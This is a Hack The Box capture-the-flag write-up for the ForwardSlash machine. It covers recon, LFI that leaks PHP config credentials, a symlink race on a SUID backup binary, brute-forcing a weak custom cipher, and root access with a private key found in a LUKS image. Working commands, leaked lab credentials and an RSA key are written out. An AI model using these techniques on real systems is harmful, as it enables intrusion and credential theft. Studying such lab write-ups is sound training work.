TL;DR
- Find the subdomain called backup
- Exploit LFI to retrieve first user credentials
- Race condition on backup script to read the configuration file and find the second user credentials
- Crack a crypto script to retrieve a key
- Mount a ciphered partition and use the key found in the previous script
User.txt
Reconnaissance
Let’s start by a Nmap scan:
magnussen@funcMyLife:~/forwardslash$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN forwardslash.txt
# Nmap 7.60 scan initiated Sun Apr 12 22:04:40 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN forwardslash.txt 10.10.10.183
Increasing send delay for 10.10.10.183 from 0 to 5 due to 148 out of 493 dropped probes since last increase.
Warning: 10.10.10.183 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.183 from 640 to 1000 due to 170 out of 566 dropped probes since last increase.
Nmap scan report for forwardslash.htb (10.10.10.183)
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2020-04-12 22:04:41 CEST for 138s
Not shown: 52808 closed ports, 12725 filtered ports
Reason: 52808 resets and 12725 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVtpfErAVlI+ACU8NH8NHbRBZj2g7pj5jk7xusWAA/J6ulNja04hhSJ/A2uEXiZg/4KrFVby7q/7IkSoNlgFkkICScBz6THy7Zfp3Xtaxoy97nlX7lb3RVzkOAtXhxCHCvIZpLUpURXHl/dQ/UXo8LS5JtuISZZCscxtRQiDUI9ySN7gPkpmNYE/UOoY/gg7+EY5qvvJ8gBzjPj6Q1C7veALXy8cE9hZpB3l3e7DdrFA0p4PMq2troma315vk0A4SgppfnAJbt8Hos6HjdQvPstaNybEMIbngABKNqmCQYQ0QQ0EnJjcOfgmODl1a4WQEqWPo7PmlBHcfFwHHkanT
| 256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDA2ykHh+xWYg9uLDiP5jLwuvTda16WWnKjRFi53m4qC+aJorLXxLo1pTC0WcqQnMHhrgmIGoETU8uk8uAZPlYw=
| 256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGcEObi5j/h3qfBkLg9GzHQAruPuU71A9w+DgmAMQsYy
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Backslash Gang
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 22:06:59 2020 -- 1 IP address (1 host up) scanned in 138.50 seconds
So we find 2 useful services on 2 ports:
- SSH (22)
- Apache (80)
The website was previously hacked by a group called The Backslash Gang.
Enumeration
With a Dirbuster scan we find the following note:
Pain, we were hacked by some skids that call themselves the “Backslash Gang”… I know… That name… Anyway I am just leaving this note here to say that we still have that backup site so we should be fine. -chiv
So it seems that they have a backup site, let’s add backup.forwardslash.htb to our /etc/hosts and check if the website exists:
Nice, it seems that we can sign up and have access to those backups.
LFI
There’s not much on this backup site, we can change our password, username, log out and there’s a couple of articles about the environment and a hall of fame, but a page catch our attention. There’s a profile picture page with disabled fields.
Let’s play with Burp and see if we can exploit this form.
So it seems that we can include the index page directly, let’s try some PHP filter:
By testing different files, we find the config.php.
<?php
//credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
With Dirbuster, we also find a dev directory.
With a PHP filter we can retrieve the following code:
<?php
//include_once ../session.php;
// Initialize the session
session_start();
if((!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true || $_SESSION['username'] !== "admin") && $_SERVER['REMOTE_ADDR'] !== "127.0.0.1"){
header('HTTP/1.0 403 Forbidden');
echo "<h1>403 Access Denied</h1>";
echo "<h3>Access Denied From ", $_SERVER['REMOTE_ADDR'], "</h3>";
//echo "<h2>Redirecting to login in 3 seconds</h2>"
//echo '<meta http-equiv="refresh" content="3;url=../login.php" />';
//header("location: ../login.php");
exit;
}
?>
<html>
<h1>XML Api Test</h1>
<h3>This is our api test for when our new website gets refurbished</h3>
<form action="/dev/index.php" method="get" id="xmltest">
<textarea name="xml" form="xmltest" rows="20" cols="50"><api>
<request>test</request>
</api>
</textarea>
<input type="submit">
</form>
</html>
<!-- TODO:
Fix FTP Login
-->
<?php
if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {
$reg = '/ftp:\/\/[\s\S]*\/\"/';
//$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'
if (preg_match($reg, $_GET['xml'], $match)) {
$ip = explode('/', $match[0])[2];
echo $ip;
error_log("Connecting");
$conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");
error_log("Logging in");
if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {
error_log("Getting file");
echo ftp_get_string($conn_id, "debug.txt");
}
exit;
}
libxml_disable_entity_loader (false);
$xmlfile = $_GET["xml"];
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$api = simplexml_import_dom($dom);
$req = $api->request;
echo "-----output-----<br>\r\n";
echo "$req";
}
function ftp_get_string($ftp, $filename) {
$temp = fopen('php://temp', 'r+');
if (@ftp_fget($ftp, $temp, $filename, FTP_BINARY, 0)) {
rewind($temp);
return stream_get_contents($temp);
}
else {
return false;
}
}
?>
Nice, we have Chiv’s credentials!
chiv:N0bodyL1kesBack/
Let’s try to connect with SSH.
magnussen@funcMyLife:~/forwardslash$ ssh chiv@forwardslash.htb
chiv@forwardslash.htb's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Apr 16 17:57:35 UTC 2020
System load: 0.42 Processes: 196
Usage of /: 30.6% of 19.56GB Users logged in: 0
Memory usage: 10% IP address for ens33: 10.10.10.183
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 packages can be updated.
0 updates are security updates.
Last login: Tue Mar 24 11:34:37 2020 from 10.10.14.3
chiv@forwardslash:~$
Race Condition
So we have a shell, let’s check what we can do:
chiv@forwardslash:~$ ll
total 32
drwxr-xr-x 5 chiv chiv 4096 Mar 24 10:53 ./
drwxr-xr-x 4 root root 4096 Mar 5 14:23 ../
lrwxrwxrwx 1 root root 9 Mar 6 09:43 .bash_history -> /dev/null
-rw-r--r-- 1 chiv chiv 220 Mar 5 14:23 .bash_logout
-rw-r--r-- 1 chiv chiv 3771 Mar 5 14:23 .bashrc
drwx------ 2 chiv chiv 4096 Mar 5 14:29 .cache/
drwx------ 3 chiv chiv 4096 Mar 5 14:29 .gnupg/
drwxrwxr-x 3 chiv chiv 4096 Mar 24 10:53 .local/
-rw-r--r-- 1 chiv chiv 807 Mar 5 14:23 .profile
chiv@forwardslash:~$ ll ../
chiv/ pain/
chiv@forwardslash:~$ ll ../pain/
total 48
drwxr-xr-x 7 pain pain 4096 Mar 17 20:28 ./
drwxr-xr-x 4 root root 4096 Mar 5 14:23 ../
lrwxrwxrwx 1 pain root 9 Mar 6 09:43 .bash_history -> /dev/null
-rw-r--r-- 1 pain pain 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 pain pain 3771 Apr 4 2018 .bashrc
drwx------ 2 pain pain 4096 Mar 5 14:22 .cache/
drwx------ 3 pain pain 4096 Mar 5 14:22 .gnupg/
drwxrwxr-x 3 pain pain 4096 Mar 6 14:23 .local/
-rw-r--r-- 1 pain pain 807 Apr 4 2018 .profile
drwx------ 2 pain pain 4096 Mar 17 20:29 .ssh/
drwxr-xr-x 2 pain root 4096 Mar 24 12:06 encryptorinator/
-rw-r--r-- 1 pain root 256 Jun 3 2019 note.txt
-rw------- 1 pain pain 33 Apr 16 17:56 user.txt
chiv@forwardslash:~$ find / -user pain 2>> /dev/null | grep -v proc
/var/backups/config.php.bak
/usr/bin/backup
/home/pain
/home/pain/.bash_history
/home/pain/.cache
/home/pain/.profile
/home/pain/user.txt
/home/pain/.gnupg
/home/pain/.bashrc
/home/pain/.local
/home/pain/.local/share
/home/pain/.bash_logout
/home/pain/.ssh
/home/pain/encryptorinator
/home/pain/encryptorinator/encrypter.py
/home/pain/encryptorinator/ciphertext
/home/pain/note.txt
chiv@forwardslash:~$ ll /usr/bin/backup
-r-sr-xr-x 1 pain pain 13384 Mar 6 10:06 /usr/bin/backup*
chiv@forwardslash:~$ ll /var/backups/
total 812
drwxr-xr-x 3 root root 4096 Mar 24 10:10 ./
drwxr-xr-x 14 root root 4096 Mar 5 14:25 ../
-rw-r--r-- 1 root root 61440 Mar 24 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 38908 Mar 24 06:17 apt.extended_states.0
-rw-r--r-- 1 root root 4115 Mar 6 14:17 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3909 Mar 5 14:46 apt.extended_states.2.gz
-rw------- 1 pain pain 526 Jun 21 2019 config.php.bak
-rw-r--r-- 1 root root 437 Mar 5 14:07 dpkg.diversions.0
-rw-r--r-- 1 root root 207 Mar 5 14:47 dpkg.statoverride.0
-rw-r--r-- 1 root root 668374 Mar 24 06:17 dpkg.status.0
-rw------- 1 root root 730 Mar 17 20:13 group.bak
-rw------- 1 root shadow 604 Mar 17 20:13 gshadow.bak
-r--r--r-- 1 root root 129 May 27 2019 note.txt
-rw------- 1 root root 1660 Mar 5 14:46 passwd.bak
drwxrwx--- 2 root backupoperator 4096 May 27 2019 recovery/
-rw------- 1 root shadow 1174 Mar 6 14:21 shadow.bak
There’s an other user called pain and a binary called backup with the SUID. There’s also a backup directory with a config.php.bak file and a note:
Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH. -Pain
If we use the program, we have the following message:
chiv@forwardslash:~$ backup
----------------------------------------------------------------------
Pain's Next-Gen Time Based Backup Viewer
v0.1
NOTE: not reading the right file yet,
only works if backup is taken in same second
----------------------------------------------------------------------
Current Time: 18:08:35
ERROR: b3ac9b5b950b1cf99281a5591206c193 Does Not Exist or Is Not Accessible By Me, Exiting...
The md5 is the time’s hash at runtime.
So it seems, that this binary is trying to read a file with the name of the time’s hash at runtime.
If this file doesn’t exists or is not accessible by pain the program crashes. It’s perfect, the program wants a file that exists and owned by pain and we want to read the config.php.bak owned by pain.
We can exploit this script by executing the script, extract the md5sum, create a symlink to config.php.bak and rerun the script to read this file. But we have to be quick and execute those steps at the same second otherwise the md5sum will be different.
chiv@forwardslash:~$ test=$(backup | grep ERROR | awk '{print $2}') && ln -s /var/backups/config.php.bak $test && backup $test
----------------------------------------------------------------------
Pain's Next-Gen Time Based Backup Viewer
v0.1
NOTE: not reading the right file yet,
only works if backup is taken in same second
----------------------------------------------------------------------
Current Time: 18:18:16
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
It works! Let’s connect as pain and retrieve the user.txt flag.
chiv@forwardslash:~$ su pain
Password:
pain@forwardslash:/home/chiv$ cd
pain@forwardslash:~$ ll
total 48
drwxr-xr-x 7 pain pain 4096 Mar 17 20:28 ./
drwxr-xr-x 4 root root 4096 Mar 5 14:23 ../
lrwxrwxrwx 1 pain root 9 Mar 6 09:43 .bash_history -> /dev/null
-rw-r--r-- 1 pain pain 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 pain pain 3771 Apr 4 2018 .bashrc
drwx------ 2 pain pain 4096 Mar 5 14:22 .cache/
drwxr-xr-x 2 pain root 4096 Mar 24 12:06 encryptorinator/
drwx------ 3 pain pain 4096 Mar 5 14:22 .gnupg/
drwxrwxr-x 3 pain pain 4096 Mar 6 14:23 .local/
-rw-r--r-- 1 pain root 256 Jun 3 2019 note.txt
-rw-r--r-- 1 pain pain 807 Apr 4 2018 .profile
drwx------ 2 pain pain 4096 Mar 17 20:29 .ssh/
-rw------- 1 pain pain 33 Apr 16 17:56 user.txt
pain@forwardslash:~$ cat user.txt
4b3576818673d8bef8b8789bcd4a829c
I AM ROOT
Crypto
We find the following note in pain’s home:
Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key… I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go. -chiv
And the following python script in the encryptorinator directory:
pain@forwardslash:~/encryptorinator$ ll
total 16
drwxr-xr-x 2 pain root 4096 Mar 24 12:06 ./
drwxr-xr-x 7 pain pain 4096 Mar 17 20:28 ../
-rw-r--r-- 1 pain root 165 Jun 3 2019 ciphertext
-rw-r--r-- 1 pain root 931 Jun 3 2019 encrypter.py
pain@forwardslash:~/encryptorinator$ cat encrypter.py
def encrypt(key, msg):
key = list(key)
msg = list(msg)
for char_key in key:
for i in range(len(msg)):
if i == 0:
tmp = ord(msg[i]) + ord(char_key) + ord(msg[-1])
else:
tmp = ord(msg[i]) + ord(char_key) + ord(msg[i-1])
while tmp > 255:
tmp -= 256
msg[i] = chr(tmp)
return '.join(msg)
def decrypt(key, msg):
key = list(key)
msg = list(msg)
for char_key in reversed(key):
for i in reversed(range(len(msg))):
if i == 0:
tmp = ord(msg[i]) - (ord(char_key) + ord(msg[-1]))
else:
tmp = ord(msg[i]) - (ord(char_key) + ord(msg[i-1]))
while tmp < 0:
tmp += 256
msg[i] = chr(tmp)
return '.join(msg)
print encrypt('REDACTED', 'REDACTED')
print decrypt('REDACTED', encrypt('REDACTED', 'REDACTED'))
pain@forwardslash:~/encryptorinator$ cat ciphertext | base64
y9ejmxqULEz2Cj4FvDJY1aILig18ij8ASccp8UWDLZfLklwvO8PHsnnGW3cjTZIV9zLKG9F+kOdZ
EkAntue8mIqF5rOjLAWI69v0UJm6QAQ1hsBmJPlcKgFyondGf7qSM7hn71i/fclpNvC0i/R+30uL
qVnwxY6lkf8nGCWBv2XgHz7grnjdb+QfK2fcGS+xS6wGPv9e3ctWpfcd4ghOsGuKv2UK
The encryptorinator script creates a ciphered text by making the sum of a character, a key char and the previous char. So each ciphered char depends on the previous one.
The ciphertext is 165 bytes long, we can assume that the key isn’t longer than the message, we can easily brute force the key and check if the plain text given is the right one.
To check if the plain text is correct I’ve assumed that the given text would have the word key in it.
Here’s the script to brute force the key and retrieve the plain text from the ciphered text.
import string
from encrypter import encrypt, decrypt
with open('ciphertext') as target:
ciphertext = target.read().strip()
for length in range(165):
for value in string.printable:
msg = decrypt(value * length, ciphertext)
if ' key ' in msg:
print(msg)
exit()
Let’s try it:
magnussen@funcMyLife:~/forwardslash$ echo 'y9ejmxqULEz2Cj4FvDJY1aILig18ij8ASccp8UWDLZfLklwvO8PHsnnGW3cjTZIV9zLKG9F+kOdZEkAntue8mIqF5rOjLAWI69v0UJm6QAQ1hsBmJPlcKgFyondGf7qSM7hn71i/fclpNvC0i/R+30uLqVnwxY6lkf8nGCWBv2XgHz7grnjdb+QfK2fcGS+xS6wGPv9e3ctWpfcd4ghOsGuKv2UK' | base64 -d > ciphertext
magnussen@funcMyLife:~/forwardslash$ python decryptor.py
��%\Q8��
REDACTED
Hl��vF��;�������&you liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf
Nice, we have the key, we just have to find where to use it.
Luks
Earlier we found the recovery directory in /var/backups.
pain@forwardslash:/var/backups$ ll /var/backups/recovery/
total 976576
drwxrwx--- 2 root backupoperator 4096 May 27 2019 ./
drwxr-xr-x 3 root root 4096 Mar 24 10:10 ../
-rw-r----- 1 root backupoperator 1000000000 Mar 24 12:12 encrypted_backup.img
There’s an encrypted disk image, let’s download it and try to mount it on our filesystem:
magnussen@funcMyLife:~/forwardslash$ scp pain@forwardslash.htb:/var/backups/recovery/encrypted_backup.img .
pain@forwardslash.htb's password:
magnussen@funcMyLife:~/forwardslash$ sudo cryptsetup luksOpen /dev/loop30 encrypted_backup.img
Enter passphrase for /dev/loop30:
magnussen@funcMyLife:~/forwardslash$ sudo mkdir /media/forwardslash
magnussen@funcMyLife:~/forwardslash$ sudo mount /dev/mapper/encrypted_backup.img /media/forwardslash/
mount: /media/forwardslash: WARNING: device write-protected, mounted read-only.
magnussen@funcMyLife:~/forwardslash$ ls -alh /media/forwardslash/
total 8,0K
drwxr-xr-x 2 root root 20 mars 17 21:07 .
drwxr-xr-x 4 root root 4,0K avril 16 20:53 ..
-rw-r--r-- 1 root root 1,7K mai 27 2019 id_rsa
magnussen@funcMyLife:~/forwardslash$ cat /media/forwardslash/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA9i/r8VGof1vpIV6rhNE9hZfBDd3u6S16uNYqLn+xFgZEQBZK
RKh+WDykv/gukvUSauxWJndPq3F1Ck0xbcGQu6+1OBYb+fQ0B8raCRjwtwYF4gaf
yLFcOS111mKmUIB9qR1wDsmKRbtWPPPvgs2ruafgeiHujIEkiUUk9f3WTNqUsPQc
u2AG//ZCiqKWcWn0CcC2EhWsRQhLOvh3pGfv4gg0Gg/VNNiMPjDAYnr4iVg4XyEu
NWS2x9PtPasWsWRPLMEPtzLhJOnHE3iVJuTnFFhp2T6CtmZui4TJH3pij6wYYis9
MqzTmFwNzzx2HKS2tE2ty2c1CcW+F3GS/rn0EQIDAQABAoIBAQCPfjkg7D6xFSpa
V+rTPH6GeoB9C6mwYeDREYt+lNDsDHUFgbiCMk+KMLa6afcDkzLL/brtKsfWHwhg
G8Q+u/8XVn/jFAf0deFJ1XOmr9HGbA1LxB6oBLDDZvrzHYbhDzOvOchR5ijhIiNO
3cPx0t1QFkiiB1sarD9Wf2Xet7iMDArJI94G7yfnfUegtC5y38liJdb2TBXwvIZC
vROXZiQdmWCPEmwuE0aDj4HqmJvnIx9P4EAcTWuY0LdUU3zZcFgYlXiYT0xg2N1p
MIrAjjhgrQ3A2kXyxh9pzxsFlvIaSfxAvsL8LQy2Osl+i80WaORykmyFy5rmNLQD
Ih0cizb9AoGBAP2+PD2nV8y20kF6U0+JlwMG7WbV/rDF6+kVn0M2sfQKiAIUK3Wn
5YCeGARrMdZr4fidTN7koke02M4enSHEdZRTW2jRXlKfYHqSoVzLggnKVU/eghQs
V4gv6+cc787HojtuU7Ee66eWj0VSr0PXjFInzdSdmnd93oDZPzwF8QUnAoGBAPhg
e1VaHG89E4YWNxbfr739t5qPuizPJY7fIBOv9Z0G+P5KCtHJA5uxpELrF3hQjJU8
6Orz/0C+TxmlTGVOvkQWij4GC9rcOMaP03zXamQTSGNROM+S1I9UUoQBrwe2nQeh
i2B/AlO4PrOHJtfSXIzsedmDNLoMqO5/n/xAqLAHAoGATnv8CBntt11JFYWvpSdq
tT38SlWgjK77dEIC2/hb/J8RSItSkfbXrvu3dA5wAOGnqI2HDF5tr35JnR+s/JfW
woUx/e7cnPO9FMyr6pbr5vlVf/nUBEde37nq3rZ9mlj3XiiW7G8i9thEAm471eEi
/vpe2QfSkmk1XGdV/svbq/sCgYAZ6FZ1DLUylThYIDEW3bZDJxfjs2JEEkdko7mA
1DXWb0fBno+KWmFZ+CmeIU+NaTmAx520BEd3xWIS1r8lQhVunLtGxPKvnZD+hToW
J5IdZjWCxpIadMJfQPhqdJKBR3cRuLQFGLpxaSKBL3PJx1OID5KWMa1qSq/EUOOr
OENgOQKBgD/mYgPSmbqpNZI0/B+6ua9kQJAH6JS44v+yFkHfNTW0M7UIjU7wkGQw
ddMNjhpwVZ3//G6UhWSojUScQTERANt8R+J6dR0YfPzHnsDIoRc7IABQmxxygXDo
ZoYDzlPAlwJmoPQXauRl1CgjlyHrVUTfS0AkQH2ZbqvK5/Metq8o
-----END RSA PRIVATE KEY-----
Nice! It seems that we have root’s private RSA key! Let’s try to connect with it and retrieve the root.txt flag.
magnussen@funcMyLife:~/forwardslash$ ssh -i /media/forwardslash/id_rsa root@forwardslash.htb
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Apr 16 19:00:16 UTC 2020
System load: 0.04 Processes: 216
Usage of /: 30.7% of 19.56GB Users logged in: 1
Memory usage: 12% IP address for ens33: 10.10.10.183
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Mar 24 12:11:46 2020 from 10.10.14.3
root@forwardslash:~# id
uid=0(root) gid=0(root) groups=0(root)
root@forwardslash:~# cat root.txt
3b7f70c2e0c854f59a65f87d6a103921
I AM ROOT!
I rooted this box one year after signing up on Hack The Box and this was my first hard box, I’ve learned a lot and this was a really fun box.
Thank you InfoSecJack & chivato for this awesome box. And thanks a lot Catwyth and Azgog who helped me on this box!